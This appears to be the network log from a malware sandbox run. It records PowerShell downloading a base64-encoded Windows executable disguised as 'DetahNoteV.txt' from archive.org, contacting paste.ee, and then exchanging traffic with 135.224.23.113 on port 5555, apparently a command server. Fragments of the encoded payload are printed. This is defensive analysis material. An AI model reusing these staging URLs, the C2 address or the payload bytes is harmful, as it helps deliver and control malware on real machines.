                                            Sep 25, 2024 15:26:31.422127962 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.422156096 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.422168970 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.422199011 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.446044922 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.446069002 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.446166992 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.446186066 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.446223974 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.449934959 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.449951887 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.450017929 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.450042963 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.450088024 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.482907057 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.482935905 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.483017921 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.483087063 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.483125925 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.483150959 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.491487980 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.491518974 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.491596937 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.491633892 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.491695881 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.515360117 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.515405893 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.515472889 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.515497923 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.515547037 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.515547037 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.526690006 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.526714087 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.526803970 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.526823997 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.526882887 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.597094059 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.597121954 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.597245932 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.597290993 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.597347975 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.606857061 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.606883049 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.606962919 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.607008934 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.607064962 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.607086897 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.612848043 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.612869978 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.612977982 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.612993002 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.613033056 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.631453037 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.631474018 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.631582975 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.631608009 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.631645918 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.654479980 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.654503107 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.654575109 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.654593945 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.654650927 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.730498075 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.730521917 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.730653048 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.730673075 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.730715990 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.747215986 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.747239113 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.747338057 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.747351885 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.747400999 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.791852951 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.791878939 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.791979074 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.791999102 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.792040110 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.797523022 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.797612906 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:31.797640085 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.797683954 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:31.810347080 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:32.448431015 CEST49708443192.168.2.9188.114.96.3
                                            Sep 25, 2024 15:26:32.448472023 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:32.448576927 CEST49708443192.168.2.9188.114.96.3
                                            Sep 25, 2024 15:26:32.449042082 CEST49708443192.168.2.9188.114.96.3
                                            Sep 25, 2024 15:26:32.449059010 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.009257078 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.009474993 CEST49708443192.168.2.9188.114.96.3
                                            Sep 25, 2024 15:26:33.014529943 CEST49708443192.168.2.9188.114.96.3
                                            Sep 25, 2024 15:26:33.014545918 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.014852047 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.016310930 CEST49708443192.168.2.9188.114.96.3
                                            Sep 25, 2024 15:26:33.059407949 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.237783909 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.237838030 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.237950087 CEST49708443192.168.2.9188.114.96.3
                                            Sep 25, 2024 15:26:33.237963915 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.238497019 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.238564968 CEST49708443192.168.2.9188.114.96.3
                                            Sep 25, 2024 15:26:33.238571882 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.239686966 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.239721060 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.239753008 CEST49708443192.168.2.9188.114.96.3
                                            Sep 25, 2024 15:26:33.239762068 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.239810944 CEST49708443192.168.2.9188.114.96.3
                                            Sep 25, 2024 15:26:33.278165102 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.280251980 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.280322075 CEST49708443192.168.2.9188.114.96.3
                                            Sep 25, 2024 15:26:33.280333996 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.280780077 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.280864000 CEST49708443192.168.2.9188.114.96.3
                                            Sep 25, 2024 15:26:33.280872107 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.325927019 CEST49708443192.168.2.9188.114.96.3
                                            Sep 25, 2024 15:26:33.341157913 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.342775106 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.342840910 CEST49708443192.168.2.9188.114.96.3
                                            Sep 25, 2024 15:26:33.342850924 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.347232103 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.347311020 CEST49708443192.168.2.9188.114.96.3
                                            Sep 25, 2024 15:26:33.347317934 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.353442907 CEST44349708188.114.96.3192.168.2.9
                                            Sep 25, 2024 15:26:33.353575945 CEST49708443192.168.2.9188.114.96.3
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 25, 2024 15:26:33.353583097 CEST | 443 | 49708 | 188.114.96.3 | 192.168.2.9
Sep 25, 2024 15:26:33.359833956 CEST | 443 | 49708 | 188.114.96.3 | 192.168.2.9
Sep 25, 2024 15:26:33.359981060 CEST | 49708 | 443 | 192.168.2.9 | 188.114.96.3
Sep 25, 2024 15:26:33.359992981 CEST | 443 | 49708 | 188.114.96.3 | 192.168.2.9
Sep 25, 2024 15:26:33.368036032 CEST | 443 | 49708 | 188.114.96.3 | 192.168.2.9
Sep 25, 2024 15:26:33.368067026 CEST | 443 | 49708 | 188.114.96.3 | 192.168.2.9
Sep 25, 2024 15:26:33.368115902 CEST | 49708 | 443 | 192.168.2.9 | 188.114.96.3
Sep 25, 2024 15:26:33.368124008 CEST | 443 | 49708 | 188.114.96.3 | 192.168.2.9
Sep 25, 2024 15:26:33.368201017 CEST | 49708 | 443 | 192.168.2.9 | 188.114.96.3
Sep 25, 2024 15:26:33.373967886 CEST | 443 | 49708 | 188.114.96.3 | 192.168.2.9
Sep 25, 2024 15:26:33.386542082 CEST | 443 | 49708 | 188.114.96.3 | 192.168.2.9
Sep 25, 2024 15:26:33.386620045 CEST | 49708 | 443 | 192.168.2.9 | 188.114.96.3
Sep 25, 2024 15:26:33.386626959 CEST | 443 | 49708 | 188.114.96.3 | 192.168.2.9
Sep 25, 2024 15:26:33.393735886 CEST | 443 | 49708 | 188.114.96.3 | 192.168.2.9
Sep 25, 2024 15:26:33.393815994 CEST | 49708 | 443 | 192.168.2.9 | 188.114.96.3
Sep 25, 2024 15:26:33.393822908 CEST | 443 | 49708 | 188.114.96.3 | 192.168.2.9
Sep 25, 2024 15:26:33.405528069 CEST | 443 | 49708 | 188.114.96.3 | 192.168.2.9
Sep 25, 2024 15:26:33.405647993 CEST | 49708 | 443 | 192.168.2.9 | 188.114.96.3
Sep 25, 2024 15:26:33.405657053 CEST | 443 | 49708 | 188.114.96.3 | 192.168.2.9
Sep 25, 2024 15:26:33.410301924 CEST | 443 | 49708 | 188.114.96.3 | 192.168.2.9
Sep 25, 2024 15:26:33.410343885 CEST | 443 | 49708 | 188.114.96.3 | 192.168.2.9
Sep 25, 2024 15:26:33.410378933 CEST | 49708 | 443 | 192.168.2.9 | 188.114.96.3
Sep 25, 2024 15:26:33.410384893 CEST | 443 | 49708 | 188.114.96.3 | 192.168.2.9
Sep 25, 2024 15:26:33.410429955 CEST | 49708 | 443 | 192.168.2.9 | 188.114.96.3
Sep 25, 2024 15:26:33.410437107 CEST | 443 | 49708 | 188.114.96.3 | 192.168.2.9
Sep 25, 2024 15:26:33.410461903 CEST | 443 | 49708 | 188.114.96.3 | 192.168.2.9
Sep 25, 2024 15:26:33.410505056 CEST | 49708 | 443 | 192.168.2.9 | 188.114.96.3
Sep 25, 2024 15:26:33.410835028 CEST | 49708 | 443 | 192.168.2.9 | 188.114.96.3
Sep 25, 2024 15:26:43.758239031 CEST | 49709 | 5555 | 192.168.2.9 | 135.224.23.113
Sep 25, 2024 15:26:43.764242887 CEST | 5555 | 49709 | 135.224.23.113 | 192.168.2.9
Sep 25, 2024 15:26:43.764349937 CEST | 49709 | 5555 | 192.168.2.9 | 135.224.23.113
Sep 25, 2024 15:26:43.887825012 CEST | 49709 | 5555 | 192.168.2.9 | 135.224.23.113
Sep 25, 2024 15:26:43.894865036 CEST | 5555 | 49709 | 135.224.23.113 | 192.168.2.9
Sep 25, 2024 15:26:48.914993048 CEST | 5555 | 49709 | 135.224.23.113 | 192.168.2.9
Sep 25, 2024 15:26:48.966675997 CEST | 49709 | 5555 | 192.168.2.9 | 135.224.23.113
Sep 25, 2024 15:26:56.221498966 CEST | 49709 | 5555 | 192.168.2.9 | 135.224.23.113
Sep 25, 2024 15:26:56.226520061 CEST | 5555 | 49709 | 135.224.23.113 | 192.168.2.9
Sep 25, 2024 15:26:56.345953941 CEST | 5555 | 49709 | 135.224.23.113 | 192.168.2.9
Sep 25, 2024 15:26:56.348027945 CEST | 49709 | 5555 | 192.168.2.9 | 135.224.23.113
Sep 25, 2024 15:26:56.352874994 CEST | 5555 | 49709 | 135.224.23.113 | 192.168.2.9
Sep 25, 2024 15:27:08.561216116 CEST | 49709 | 5555 | 192.168.2.9 | 135.224.23.113
Sep 25, 2024 15:27:08.758155107 CEST | 5555 | 49709 | 135.224.23.113 | 192.168.2.9
Sep 25, 2024 15:27:08.886339903 CEST | 5555 | 49709 | 135.224.23.113 | 192.168.2.9
Sep 25, 2024 15:27:08.917548895 CEST | 49709 | 5555 | 192.168.2.9 | 135.224.23.113
Sep 25, 2024 15:27:09.216651917 CEST | 49709 | 5555 | 192.168.2.9 | 135.224.23.113
Sep 25, 2024 15:27:09.826591015 CEST | 49709 | 5555 | 192.168.2.9 | 135.224.23.113
Sep 25, 2024 15:27:09.959923029 CEST | 5555 | 49709 | 135.224.23.113 | 192.168.2.9
Sep 25, 2024 15:27:09.960056067 CEST | 49709 | 5555 | 192.168.2.9 | 135.224.23.113
Sep 25, 2024 15:27:09.960552931 CEST | 5555 | 49709 | 135.224.23.113 | 192.168.2.9
Sep 25, 2024 15:27:09.960618019 CEST | 49709 | 5555 | 192.168.2.9 | 135.224.23.113
Sep 25, 2024 15:27:09.961307049 CEST | 5555 | 49709 | 135.224.23.113 | 192.168.2.9
Sep 25, 2024 15:27:09.961445093 CEST | 49709 | 5555 | 192.168.2.9 | 135.224.23.113
Sep 25, 2024 15:27:09.961656094 CEST | 5555 | 49709 | 135.224.23.113 | 192.168.2.9
Sep 25, 2024 15:27:09.961693048 CEST | 5555 | 49709 | 135.224.23.113 | 192.168.2.9
Sep 25, 2024 15:27:09.961704969 CEST | 5555 | 49709 | 135.224.23.113 | 192.168.2.9
Sep 25, 2024 15:27:18.905785084 CEST | 5555 | 49709 | 135.224.23.113 | 192.168.2.9
Sep 25, 2024 15:27:18.951112032 CEST | 49709 | 5555 | 192.168.2.9 | 135.224.23.113
Sep 25, 2024 15:27:20.904742956 CEST | 49709 | 5555 | 192.168.2.9 | 135.224.23.113
Sep 25, 2024 15:27:20.909845114 CEST | 5555 | 49709 | 135.224.23.113 | 192.168.2.9
Sep 25, 2024 15:27:21.030072927 CEST | 5555 | 49709 | 135.224.23.113 | 192.168.2.9
Sep 25, 2024 15:27:21.031646013 CEST | 49709 | 5555 | 192.168.2.9 | 135.224.23.113
Sep 25, 2024 15:27:21.036533117 CEST | 5555 | 49709 | 135.224.23.113 | 192.168.2.9
Sep 25, 2024 15:27:33.252620935 CEST | 49709 | 5555 | 192.168.2.9 | 135.224.23.113
Sep 25, 2024 15:27:33.257477045 CEST | 5555 | 49709 | 135.224.23.113 | 192.168.2.9
Sep 25, 2024 15:27:33.542279005 CEST | 5555 | 49709 | 135.224.23.113 | 192.168.2.9
Sep 25, 2024 15:27:33.562566042 CEST | 49709 | 5555 | 192.168.2.9 | 135.224.23.113
Sep 25, 2024 15:27:33.567447901 CEST | 5555 | 49709 | 135.224.23.113 | 192.168.2.9
Sep 25, 2024 15:27:45.606112003 CEST | 49709 | 5555 | 192.168.2.9 | 135.224.23.113
Sep 25, 2024 15:27:45.610992908 CEST | 5555 | 49709 | 135.224.23.113 | 192.168.2.9
Sep 25, 2024 15:27:45.733238935 CEST | 5555 | 49709 | 135.224.23.113 | 192.168.2.9
Sep 25, 2024 15:27:45.737885952 CEST | 49709 | 5555 | 192.168.2.9 | 135.224.23.113
Sep 25, 2024 15:27:45.742752075 CEST | 5555 | 49709 | 135.224.23.113 | 192.168.2.9
Sep 25, 2024 15:27:46.373193026 CEST | 49709 | 5555 | 192.168.2.9 | 135.224.23.113
Sep 25, 2024 15:27:46.378143072 CEST | 5555 | 49709 | 135.224.23.113 | 192.168.2.9
Sep 25, 2024 15:27:46.497478008 CEST | 5555 | 49709 | 135.224.23.113 | 192.168.2.9
Sep 25, 2024 15:27:46.499555111 CEST | 49709 | 5555 | 192.168.2.9 | 135.224.23.113
Sep 25, 2024 15:27:46.504370928 CEST | 5555 | 49709 | 135.224.23.113 | 192.168.2.9
Sep 25, 2024 15:27:48.920022964 CEST | 5555 | 49709 | 135.224.23.113 | 192.168.2.9
Sep 25, 2024 15:27:48.966810942 CEST | 49709 | 5555 | 192.168.2.9 | 135.224.23.113
Sep 25, 2024 15:27:51.951642036 CEST | 49709 | 5555 | 192.168.2.9 | 135.224.23.113
Sep 25, 2024 15:27:51.956706047 CEST | 5555 | 49709 | 135.224.23.113 | 192.168.2.9
Sep 25, 2024 15:27:52.076092958 CEST | 5555 | 49709 | 135.224.23.113 | 192.168.2.9
Sep 25, 2024 15:27:52.082475901 CEST | 49709 | 5555 | 192.168.2.9 | 135.224.23.113
Sep 25, 2024 15:27:52.087430000 CEST | 5555 | 49709 | 135.224.23.113 | 192.168.2.9
Sep 25, 2024 15:28:02.765249014 CEST | 49709 | 5555 | 192.168.2.9 | 135.224.23.113
Sep 25, 2024 15:28:02.770279884 CEST | 5555 | 49709 | 135.224.23.113 | 192.168.2.9
Sep 25, 2024 15:28:02.892901897 CEST | 5555 | 49709 | 135.224.23.113 | 192.168.2.9
Sep 25, 2024 15:28:02.894696951 CEST | 49709 | 5555 | 192.168.2.9 | 135.224.23.113
Sep 25, 2024 15:28:02.899647951 CEST | 5555 | 49709 | 135.224.23.113 | 192.168.2.9
Sep 25, 2024 15:28:13.935941935 CEST | 49709 | 5555 | 192.168.2.9 | 135.224.23.113
Sep 25, 2024 15:28:13.940835953 CEST | 5555 | 49709 | 135.224.23.113 | 192.168.2.9
Sep 25, 2024 15:28:14.326148033 CEST | 5555 | 49709 | 135.224.23.113 | 192.168.2.9
Sep 25, 2024 15:28:14.326621056 CEST | 5555 | 49709 | 135.224.23.113 | 192.168.2.9
Sep 25, 2024 15:28:14.326745033 CEST | 49709 | 5555 | 192.168.2.9 | 135.224.23.113
Sep 25, 2024 15:28:14.327131987 CEST | 49709 | 5555 | 192.168.2.9 | 135.224.23.113
Sep 25, 2024 15:28:14.335299015 CEST | 5555 | 49709 | 135.224.23.113 | 192.168.2.9
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 25, 2024 15:26:21.566273928 CEST | 52748 | 53 | 192.168.2.9 | 1.1.1.1
Sep 25, 2024 15:26:21.721223116 CEST | 53 | 52748 | 1.1.1.1 | 192.168.2.9
Sep 25, 2024 15:26:32.437021017 CEST | 53384 | 53 | 192.168.2.9 | 1.1.1.1
Sep 25, 2024 15:26:32.447654009 CEST | 53 | 53384 | 1.1.1.1 | 192.168.2.9
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 25, 2024 15:26:21.566273928 CEST | 192.168.2.9 | 1.1.1.1 | 0x6c8 | Standard query (0) | ia600100.us.archive.org | A (IP address) | IN (0x0001) | false
Sep 25, 2024 15:26:32.437021017 CEST | 192.168.2.9 | 1.1.1.1 | 0x5206 | Standard query (0) | paste.ee | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 25, 2024 15:26:21.721223116 CEST | 1.1.1.1 | 192.168.2.9 | 0x6c8 | No error (0) | ia600100.us.archive.org | - | 207.241.227.240 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 15:26:32.447654009 CEST | 1.1.1.1 | 192.168.2.9 | 0x5206 | No error (0) | paste.ee | - | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 15:26:32.447654009 CEST | 1.1.1.1 | 192.168.2.9 | 0x5206 | No error (0) | paste.ee | - | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                                            • ia600100.us.archive.org
                                            • paste.ee
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49707 | 207.241.227.240 | 443 | 7348 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-25 13:26:22 UTC | 109 | OUT | GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1
                                            Host: ia600100.us.archive.org
                                            Connection: Keep-Alive
2024-09-25 13:26:22 UTC | 606 | IN | HTTP/1.1 200 OK
                                            Server: nginx/1.24.0 (Ubuntu)
                                            Date: Wed, 25 Sep 2024 13:26:22 GMT
                                            Content-Type: text/plain; charset=utf-8
                                            Content-Length: 2823512
                                            Last-Modified: Wed, 11 Sep 2024 23:50:18 GMT
                                            Connection: close
                                            ETag: "66e22cba-2b1558"
                                            Strict-Transport-Security: max-age=15724800
                                            Expires: Wed, 25 Sep 2024 19:26:22 GMT
                                            Cache-Control: max-age=21600
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                                            Access-Control-Allow-Credentials: true
                                            Accept-Ranges: bytes
                                            2024-09-25 13:26:22 UTC15778INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 42 6f 43 42 62 6f 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 54 41 41 41 45 59 67 41 41 41 49 41 41 41 41 41 41 41 41 76 6d 55 67 41 41 41 67 41 41 41 41 67 43 41 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                                            Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDABoCBboAAAAAAAAAAOAADiELATAAAEYgAAAIAAAAAAAAvmUgAAAgAAAAgCAAAABAAAAgAAAAAgA
                                            2024-09-25 13:26:22 UTC16384INData Raw: 41 41 41 50 34 4d 45 77 42 46 41 67 41 41 41 41 55 41 41 41 41 31 41 41 41 41 4f 41 41 41 41 41 41 41 45 51 4d 52 46 78 45 49 63 35 73 46 41 41 5a 76 63 51 41 41 43 69 41 42 41 41 41 41 66 73 55 49 41 41 52 37 42 51 6b 41 42 44 6e 4a 2f 2f 2f 2f 4a 69 41 41 41 41 41 41 4f 4c 37 2f 2f 2f 38 41 41 4e 30 66 41 41 41 41 49 41 49 41 41 41 42 2b 78 51 67 41 42 48 73 53 43 51 41 45 4f 73 6e 36 2f 2f 38 6d 49 41 41 41 41 41 41 34 76 76 72 2f 2f 78 45 44 62 79 73 41 41 41 6f 57 50 6f 38 41 41 41 41 67 41 51 41 41 41 48 37 46 43 41 41 45 65 77 73 4a 41 41 51 36 6e 66 72 2f 2f 79 59 67 41 51 41 41 41 44 69 53 2b 76 2f 2f 45 67 63 6f 63 41 41 41 43 68 4d 49 49 41 55 41 41 41 42 2b 78 51 67 41 42 48 76 30 43 41 41 45 4f 6e 58 36 2f 2f 38 6d 49 41 59 41 41 41 41 34 61
                                            Data Ascii: AAAP4MEwBFAgAAAAUAAAA1AAAAOAAAAAAAEQMRFxEIc5sFAAZvcQAACiABAAAAfsUIAAR7BQkABDnJ////JiAAAAAAOL7///8AAN0fAAAAIAIAAAB+xQgABHsSCQAEOsn6//8mIAAAAAA4vvr//xEDbysAAAoWPo8AAAAgAQAAAH7FCAAEewsJAAQ6nfr//yYgAQAAADiS+v//EgcocAAAChMIIAUAAAB+xQgABHv0CAAEOnX6//8mIAYAAAA4a
                                            2024-09-25 13:26:23 UTC16384INData Raw: 2f 2f 2f 77 41 52 42 47 39 49 49 77 41 47 62 33 51 41 41 41 6f 54 42 53 41 46 41 41 41 41 4f 44 48 2f 2f 2f 38 41 4f 4e 73 41 41 41 41 67 43 41 41 41 41 44 67 45 41 41 41 41 2f 67 77 4d 41 45 55 67 41 41 41 41 4f 51 49 41 41 47 34 43 41 41 42 61 41 51 41 41 66 51 41 41 41 4d 73 43 41 41 43 4d 41 51 41 41 46 41 45 41 41 4a 77 44 41 41 43 55 41 41 41 41 41 51 4d 41 41 4c 77 41 41 41 41 57 41 41 41 41 33 41 49 41 41 4d 63 42 41 41 43 6a 41 51 41 41 53 67 49 41 41 41 55 41 41 41 43 62 41 67 41 41 58 67 41 41 41 49 45 42 41 41 41 38 41 51 41 41 61 77 45 41 41 42 30 44 41 41 44 38 41 41 41 41 66 77 49 41 41 4f 30 42 41 41 44 68 41 41 41 41 53 77 45 41 41 44 51 41 41 41 42 46 41 41 41 41 49 51 41 41 41 42 4d 43 41 41 41 34 4e 41 49 41 41 42 45 49 4f 6a 30 44 41
                                            Data Ascii: ///wARBG9IIwAGb3QAAAoTBSAFAAAAODH///8AONsAAAAgCAAAADgEAAAA/gwMAEUgAAAAOQIAAG4CAABaAQAAfQAAAMsCAACMAQAAFAEAAJwDAACUAAAAAQMAALwAAAAWAAAA3AIAAMcBAACjAQAASgIAAAUAAACbAgAAXgAAAIEBAAA8AQAAawEAAB0DAAD8AAAAfwIAAO0BAADhAAAASwEAADQAAABFAAAAIQAAABMCAAA4NAIAABEIOj0DA
                                            2024-09-25 13:26:23 UTC16384INData Raw: 38 52 43 53 68 31 41 67 41 47 62 7a 49 6a 41 41 59 52 43 57 2f 47 49 67 41 47 4b 48 59 43 41 41 5a 76 4d 69 4d 41 42 69 68 30 41 67 41 47 45 77 38 67 43 51 41 41 41 48 37 46 43 41 41 45 65 38 49 49 41 41 51 36 7a 50 37 2f 2f 79 59 67 44 51 41 41 41 44 6a 42 2f 76 2f 2f 45 51 49 54 41 79 41 49 41 41 41 41 2f 67 34 4b 41 44 69 72 2f 76 2f 2f 4f 42 73 42 41 41 41 67 41 41 41 41 41 48 37 46 43 41 41 45 65 37 4d 49 41 41 51 36 6c 76 37 2f 2f 79 59 67 41 41 41 41 41 44 69 4c 2f 76 2f 2f 45 51 45 67 70 30 47 63 33 79 41 44 41 41 41 41 59 79 42 63 44 35 4f 49 59 58 37 46 43 41 41 45 65 38 51 49 41 41 52 68 4b 46 51 43 41 41 59 6f 59 77 49 41 42 68 4d 43 49 42 34 41 41 41 41 34 56 2f 37 2f 2f 78 45 48 4f 6c 6f 42 41 41 41 67 43 67 41 41 41 48 37 46 43 41 41 45 65
